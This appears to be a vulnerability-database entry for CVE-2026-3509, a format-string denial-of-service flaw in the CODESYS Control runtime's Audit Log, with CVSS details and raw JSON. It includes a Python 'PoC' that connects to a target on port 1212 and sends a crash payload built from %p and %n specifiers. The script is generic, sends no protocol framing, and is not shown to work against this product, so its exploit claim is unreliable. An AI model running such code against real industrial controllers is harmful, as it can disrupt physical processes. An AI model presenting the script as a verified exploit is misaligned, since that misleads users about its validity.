Security Vulnerability Report
CVE-2026-3509 CVSS 7.5 HIGH

CVE-2026-3509

Published: 2026-03-24 08:16:02
Last Modified: 2026-03-24 15:53:48

Description

An unauthenticated remote attacker may be able to control the format string of messages processed by the Audit Log of the CODESYS Control runtime system, potentially resulting in a denial‑of‑service (DoS) condition.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CODESYS Control Runtime (for the specific affected versions, refer to vendor advisory VDE-2026-018)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-3509: Format String in Audit Log
# Description: Sends a malicious format string payload to the target service.
import socket


def send_exploit(target_ip, target_port):
    # Malicious payload containing format specifiers
    # %p reads from stack, %n writes to memory (likely causing crash)
    payload = b"AAAA%p%p%p%p%n%n%n"
    try:
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        print("[*] Sending malicious payload...")
        s.send(payload)
        response = s.recv(1024)
        print(f"[+] Received response (might be empty if crashed): {response}")
        s.close()
        print("[+] Exploit packet sent.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "192.168.1.10"
    TARGET_PORT = 1212
    send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3509", "sourceIdentifier": "[email protected]", "published": "2026-03-24T08:16:01.657", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker may be able to control the format string of messages processed by the Audit Log of the CODESYS Control runtime system, potentially resulting in a denial‑of‑service (DoS) condition."}, {"lang": "es", "value": "Un atacante remoto no autenticado podría controlar la cadena de formato de los mensajes procesados por el Registro de Auditoría del sistema de tiempo de ejecución CODESYS Control, resultando potencialmente en una condición de denegación de servicio (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-134"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-018", "source": "[email protected]"}]}}